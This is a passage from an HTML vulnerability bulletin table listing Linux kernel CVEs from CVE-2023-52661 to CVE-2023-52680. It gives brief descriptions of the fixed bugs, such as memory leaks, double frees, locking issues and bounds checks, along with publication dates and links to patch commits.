<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52661" target="_blank">CVE-2023-52661</a><br><a href="https://git.kernel.org/stable/c/2388c36e028fff7f8ffd515681a14c6c2c07fea7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/45c8034db47842b25a3ab6139d71e13b4e67b9b3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5c8dc26e31b8b410ad1895e0d314def50c76eed0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/845322a9c06dd1dcf35b6c4e3af89684297c23cc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f3f407ccbe84a34de9be3195d22cdd5969f3fd9f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fa74e4f5d0821829545b9f7034a0e577c205c101" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: fix a memleak in vmw_gmrid_man_get_node When ida_alloc_max fails, resources allocated before should be freed, including *res allocated by kmalloc and ttm_resource_init.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52662" target="_blank">CVE-2023-52662</a><br><a href="https://git.kernel.org/stable/c/03b1072616a8f7d6e8594f643b416a9467c83fbf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/40624af6674745e174c754a20d7c53c250e65e7a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6fc6233f6db1579b69b54b44571f1a7fde8186e6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/83e0f220d1e992fa074157fcf14945bf170ffbc5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/89709105a6091948ffb6ec2427954cbfe45358ce" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d1e546ab91c670e536a274a75481034ab7534876" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: amd: Fix memory leak in amd_sof_acp_probe() Driver uses kasprintf() to initialize fw_{code,data}_bin members of struct acp_dev_data, but kfree() is never called to deallocate the memory, which results in a memory leak. Fix the issue by switching to devm_kasprintf(). Additionally, ensure the allocation was successful by checking the pointer validity.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52663" target="_blank">CVE-2023-52663</a><br><a href="https://git.kernel.org/stable/c/222be59e5eed1554119294edc743ee548c2371d0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7296152e58858f928db448826eb7ba5ae611297b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/88028c45d5871dfc449b2b0a27abf6428453a5ec" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/be4760799c6a7c01184467287f0de41e0dd255f8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: atlantic: eliminate double free in error handling logic Driver has a logic leak in ring data allocation/free, where aq_ring_free could be called multiple times on same ring, if system is under stress and got memory allocation error. Ring pointer was used as an indicator of failure, but this is not correct since only ring data is allocated/deallocated. Ring itself is an array member. Changing ring allocation functions to return error code directly. This simplifies error handling and eliminates aq_ring_free on higher layer.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52664" target="_blank">CVE-2023-52664</a><br><a href="https://git.kernel.org/stable/c/0edb3ae8bfa31cd544b0c195bdec00e036002b5d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b3cb7a830a24527877b0bc900b9bd74a96aea928" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c11a870a73a3bc4cc7df6dd877a45b181795fcbf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d1fde4a7e1dcc4d49cce285107a7a43c3030878d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: powerpc/ps3_defconfig: Disable PPC64_BIG_ENDIAN_ELF_ABI_V2 Commit 8c5fa3b5c4df ("powerpc/64: Make ELFv2 the default for big-endian builds"), merged in Linux-6.5-rc1 changes the calling ABI in a way that is incompatible with the current code for the PS3's LV1 hypervisor calls. This change just adds the line '# CONFIG_PPC64_BIG_ENDIAN_ELF_ABI_V2 is not set' to the ps3_defconfig file so that the PPC64_ELF_ABI_V1 is used. Fixes run time errors like these: BUG: Kernel NULL pointer dereference at 0x00000000 Faulting instruction address: 0xc000000000047cf0 Oops: Kernel access of bad area, sig: 11 [#1] Call Trace: [c0000000023039e0] [c00000000100ebfc] ps3_create_spu+0xc4/0x2b0 (unreliable) [c000000002303ab0] [c00000000100d4c4] create_spu+0xcc/0x3c4 [c000000002303b40] [c00000000100eae4] ps3_enumerate_spus+0xa4/0xf8</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52665" target="_blank">CVE-2023-52665</a><br><a href="https://git.kernel.org/stable/c/482b718a84f08b6fc84879c3e90cc57dba11c115" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d0f0780f03df54d08ced118d27834ee5008724e4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f70557d48215b14a9284ac3a6ae7e4ee1d039f10" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix potential circular locking issue in smb2_set_ea() smb2_set_ea() can be called in parent inode lock range. So add get_write argument to smb2_set_ea() not to call nested mnt_want_write().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52666" target="_blank">CVE-2023-52666</a><br><a href="https://git.kernel.org/stable/c/5349fd419e4f685d609c85b781f2b70f0fb14848" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6fc0a265e1b932e5e97a038f99e29400a93baad0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e61fc656ceeaec65f19a92f0ffbeb562b7941e8d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e9ec6665de8f706b4f4133b87b2bd02a159ec57b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ecfd93955994ecc2a1308f5ee4bd90c7fca9a8c6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: fix a potential double-free in fs_any_create_groups When kcalloc() for ft-&gt;g succeeds but kvzalloc() for in fails, fs_any_create_groups() will free ft-&gt;g. However, its caller fs_any_create_table() will free ft-&gt;g again through calling mlx5e_destroy_flow_table(), which will lead to a double-free. Fix this by setting ft-&gt;g to NULL in fs_any_create_groups().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52667" target="_blank">CVE-2023-52667</a><br><a href="https://git.kernel.org/stable/c/2897c981ee63e1be5e530b1042484626a10b26d8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/65a4ade8a6d205979292e88beeb6a626ddbd4779" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/72a729868592752b5a294d27453da264106983b1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/aef855df7e1bbd5aa4484851561211500b22707e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b2fa86b2aceb4bc9ada51cea90f61546d7512cbe" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: fix lock ordering in btrfs_zone_activate() The btrfs CI reported a lockdep warning as follows by running generic generic/129. WARNING: possible circular locking dependency detected 6.7.0-rc5+ #1 Not tainted ------------------------------------------------------ kworker/u5:5/793427 is trying to acquire lock: ffff88813256d028 (&amp;cache-&gt;lock){+.+.}-{2:2}, at: btrfs_zone_finish_one_bg+0x5e/0x130 but task is already holding lock: ffff88810a23a318 (&amp;fs_info-&gt;zone_active_bgs_lock){+.+.}-{2:2}, at: btrfs_zone_finish_one_bg+0x34/0x130 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (&amp;fs_info-&gt;zone_active_bgs_lock){+.+.}-{2:2}: ... -&gt; #0 (&amp;cache-&gt;lock){+.+.}-{2:2}: ... This is because we take fs_info-&gt;zone_active_bgs_lock after a block_group's lock in btrfs_zone_activate() while doing the opposite in other places. Fix the issue by expanding the fs_info-&gt;zone_active_bgs_lock's critical section and taking it before a block_group's lock.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52668" target="_blank">CVE-2023-52668</a><br><a href="https://git.kernel.org/stable/c/1908e9d01e5395adff68d9d308a0fb15337e6272" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6f74989f5909cdec9b1274641f0fa306b15bb476" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b18f3b60b35a8c01c9a2a0f0d6424c6d73971dc3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: crypto: s390/aes - Fix buffer overread in CTR mode When processing the last block, the s390 ctr code will always read a whole block, even if there isn't a whole block of data left. Fix this by using the actual length left and copy it into a buffer first for processing.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52669" target="_blank">CVE-2023-52669</a><br><a href="https://git.kernel.org/stable/c/a7f580cdb42ec3d53bbb7c4e4335a98423703285" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cd51e26a3b89706beec64f2d8296cfb1c34e0c79" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d07f951903fa9922c375b8ab1ce81b18a0034e3b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d68ac38895e84446848b7647ab9458d54cacba3e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dbc9a791a70ea47be9f2acf251700fe254a2ab23" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e78f1a43e72daf77705ad5b9946de66fc708b874" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: rpmsg: virtio: Free driver_override when rpmsg_remove() Free driver_override when rpmsg_remove(), otherwise the following memory leak will occur: unreferenced object 0xffff0000d55d7080 (size 128): comm "kworker/u8:2", pid 56, jiffies 4294893188 (age 214.272s) hex dump (first 32 bytes): 72 70 6d 73 67 5f 6e 73 00 00 00 00 00 00 00 00 rpmsg_ns........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [&lt;000000009c94c9c1&gt;] __kmem_cache_alloc_node+0x1f8/0x320 [&lt;000000002300d89b&gt;] __kmalloc_node_track_caller+0x44/0x70 [&lt;00000000228a60c3&gt;] kstrndup+0x4c/0x90 [&lt;0000000077158695&gt;] driver_set_override+0xd0/0x164 [&lt;000000003e9c4ea5&gt;] rpmsg_register_device_override+0x98/0x170 [&lt;000000001c0c89a8&gt;] rpmsg_ns_register_device+0x24/0x30 [&lt;000000008bbf8fa2&gt;] rpmsg_probe+0x2e0/0x3ec [&lt;00000000e65a68df&gt;] virtio_dev_probe+0x1c0/0x280 [&lt;00000000443331cc&gt;] really_probe+0xbc/0x2dc [&lt;00000000391064b1&gt;] __driver_probe_device+0x78/0xe0 [&lt;00000000a41c9a5b&gt;] driver_probe_device+0xd8/0x160 [&lt;000000009c3bd5df&gt;] __device_attach_driver+0xb8/0x140 [&lt;0000000043cd7614&gt;] bus_for_each_drv+0x7c/0xd4 [&lt;000000003b929a36&gt;] __device_attach+0x9c/0x19c [&lt;00000000a94e0ba8&gt;] device_initial_probe+0x14/0x20 [&lt;000000003c999637&gt;] bus_probe_device+0xa0/0xac</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52670" target="_blank">CVE-2023-52670</a><br><a href="https://git.kernel.org/stable/c/229ce47cbfdc7d3a9415eb676abbfb77d676cb08" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2d27a7b19cb354c6d04bcdc9239e261ff29858d6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4e6cef3fae5c164968118a13f3fe293700adc81a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/69ca89d80f2c8a1f5af429b955637beea7eead30" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a416d624e5fb7246ea97c11fbfea7e0e27abf43" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d5362c37e1f8a40096452fc201c30e705750e687" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dd50fe18c234bd5ff22f658f4d414e8fa8cd6a5d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f4bb1d5daf77b1a95a43277268adf0d1430c2346" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix hang/underflow when transitioning to ODM4:1 [Why] Under some circumstances, disabling an OPTC and attempting to reclaim its OPP(s) for a different OPTC could cause a hang/underflow due to OPPs not being properly disconnected from the disabled OPTC. [How] Ensure that all OPPs are unassigned from an OPTC when it gets disabled.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52671" target="_blank">CVE-2023-52671</a><br><a href="https://git.kernel.org/stable/c/4b6b479b2da6badff099b2e3abf0248936eefbf5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ae62f1dde66a6f0eee98defc4c7a346bd5acd239" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e7b2b108cdeab76a7e7324459e50b0c1214c0386" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: pipe: wakeup wr_wait after setting max_usage Commit c73be61cede5 ("pipe: Add general notification queue support") a regression was introduced that would lock up resized pipes under certain conditions. See the reproducer in [1]. The commit resizing the pipe ring size was moved to a different function, doing that moved the wakeup for pipe-&gt;wr_wait before actually raising pipe-&gt;max_usage. If a pipe was full before the resize occured it would result in the wakeup never actually triggering pipe_write. Set @max_usage and @nr_accounted before waking writers if this isn't a watch queue. [Christian Brauner &lt;brauner@kernel.org&gt;: rewrite to account for watch queues]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52672" target="_blank">CVE-2023-52672</a><br><a href="https://git.kernel.org/stable/c/162ae0e78bdabf84ef10c1293c4ed7865cb7d3c8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3efbd114b91525bb095b8ae046382197d92126b9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/68e51bdb1194f11d3452525b99c98aff6f837b24" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6fb70694f8d1ac34e45246b0ac988f025e1e5b55" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b87a1229d8668fbc78ebd9ca0fc797a76001c60f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e95aada4cb93d42e25c30a0ef9eb2923d9711d4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix a debugfs null pointer error [WHY &amp; HOW] Check whether get_subvp_en() callback exists before calling it.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52673" target="_blank">CVE-2023-52673</a><br><a href="https://git.kernel.org/stable/c/43235db21fc23559f50a62f8f273002eeb506f5a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/efb91fea652a42fcc037d2a9ef4ecd1ffc5ff4b7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ALSA: scarlett2: Add clamp() in scarlett2_mixer_ctl_put() Ensure the value passed to scarlett2_mixer_ctl_put() is between 0 and SCARLETT2_MIXER_MAX_VALUE so we don't attempt to access outside scarlett2_mixer_values[].</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52674" target="_blank">CVE-2023-52674</a><br><a href="https://git.kernel.org/stable/c/03035872e17897ba89866940bbc9cefca601e572" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/04f8f053252b86c7583895c962d66747ecdc61b7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ad945ea8d47dd4454c271510bea24850119847c2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d8d8897d65061cbe36bf2909057338303a904810" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e517645ead5ea22c69d2a44694baa23fe1ce7c2b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: powerpc/imc-pmu: Add a null pointer check in update_events_in_group() kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52675" target="_blank">CVE-2023-52675</a><br><a href="https://git.kernel.org/stable/c/024352f7928b28f53609660663329d8c0f4ad032" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0a233867a39078ebb0f575e2948593bbff5826b3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1e80aa25d186a7aa212df5acd8c75f55ac8dae34" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5a669f3511d273c8c1ab1c1d268fbcdf53fc7a05" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/75fc599bcdcb1de093c9ced2e3cccc832f3787f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a2da3f9b1a1019c887ee1d164475a8fcdb0a3fec" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c7d828e12b326ea50fb80c369d7aa87519ed14c6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f105c263009839d80fad6998324a4e1b3511cba0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: bpf: Guard stack limits against 32bit overflow This patch promotes the arithmetic around checking stack bounds to be done in the 64-bit domain, instead of the current 32bit. The arithmetic implies adding together a 64-bit register with a int offset. The register was checked to be below 1&lt;&lt;29 when it was variable, but not when it was fixed. The offset either comes from an instruction (in which case it is 16 bit), from another register (in which case the caller checked it to be below 1&lt;&lt;29 [1]), or from the size of an argument to a kfunc (in which case it can be a u32 [2]). Between the register being inconsistently checked to be below 1&lt;&lt;29, and the offset being up to an u32, it appears that we were open to overflowing the `int`s which were currently used for arithmetic. [1] https://github.com/torvalds/linux/blob/815fb87b753055df2d9e50f6cd80eb10235fe3e9/kernel/bpf/verifier.c#L7494-L7498 [2] https://github.com/torvalds/linux/blob/815fb87b753055df2d9e50f6cd80eb10235fe3e9/kernel/bpf/verifier.c#L11904</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52676" target="_blank">CVE-2023-52676</a><br><a href="https://git.kernel.org/stable/c/1d38a9ee81570c4bd61f557832dead4d6f816760" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ad140fc856f0b1d5e2215bcb6d0cc247a86805a2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e5ad9ecb84405637df82732ee02ad741a5f782a6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: riscv: Check if the code to patch lies in the exit section Otherwise we fall through to vmalloc_to_page() which panics since the address does not lie in the vmalloc region.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52677" target="_blank">CVE-2023-52677</a><br><a href="https://git.kernel.org/stable/c/1d7a03052846f34d624d0ab41a879adf5e85c85f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/420370f3ae3d3b883813fd3051a38805160b2b9f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/890cfe5337e0aaf03ece1429db04d23c88da72e7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8db56df4a954b774bdc68917046a685a9fa2e4bc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/938f70d14618ec72e10d6fcf8a546134136d7c13" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Confirm list is non-empty before utilizing list_first_entry in kfd_topology.c Before using list_first_entry, make sure to check that list is not empty, if list is empty return -ENODATA. Fixes the below: drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_topology.c:1347 kfd_create_indirect_link_prop() warn: can 'gpu_link' even be NULL? drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_topology.c:1428 kfd_add_peer_prop() warn: can 'iolink1' even be NULL? drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_topology.c:1433 kfd_add_peer_prop() warn: can 'iolink2' even be NULL?</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52678" target="_blank">CVE-2023-52678</a><br><a href="https://git.kernel.org/stable/c/4525525cb7161d08f95d0e47025323dd10214313" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/499839eca34ad62d43025ec0b46b80e77065f6d8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4ac4e023ed7ab1c7c67d2d12b7b6198fcd099e5c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5024cce888e11e5688f77df81db9e14828495d64" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: of: Fix double free in of_parse_phandle_with_args_map In of_parse_phandle_with_args_map() the inner loop that iterates through the map entries calls of_node_put(new) to free the reference acquired by the previous iteration of the inner loop. This assumes that the value of "new" is NULL on the first iteration of the inner loop. Make sure that this is true in all iterations of the outer loop by setting "new" to NULL after its value is assigned to "cur". Extend the unittest to detect the double free and add an additional test case that actually triggers this path.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52679" target="_blank">CVE-2023-52679</a><br><a href="https://git.kernel.org/stable/c/26b4d702c44f9e5cf3c5c001ae619a4a001889db" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4541004084527ce9e95a818ebbc4e6b293ffca21" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4dde83569832f9377362e50f7748463340c5db6b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a0a061151a6200c13149dbcdb6c065203c8425d2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b64d09a4e8596f76d27f4b4a90a1cf6baf6a82f8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b9d760dae5b10e73369b769073525acd7b3be2bd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cafa992134124e785609a406da4ff2b54052aff7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d5f490343c77e6708b6c4aa7dbbfbcbb9546adea" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ALSA: scarlett2: Add missing error checks to *_ctl_get() The *_ctl_get() functions which call scarlett2_update_*() were not checking the return value. Fix to check the return value and pass to the caller.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
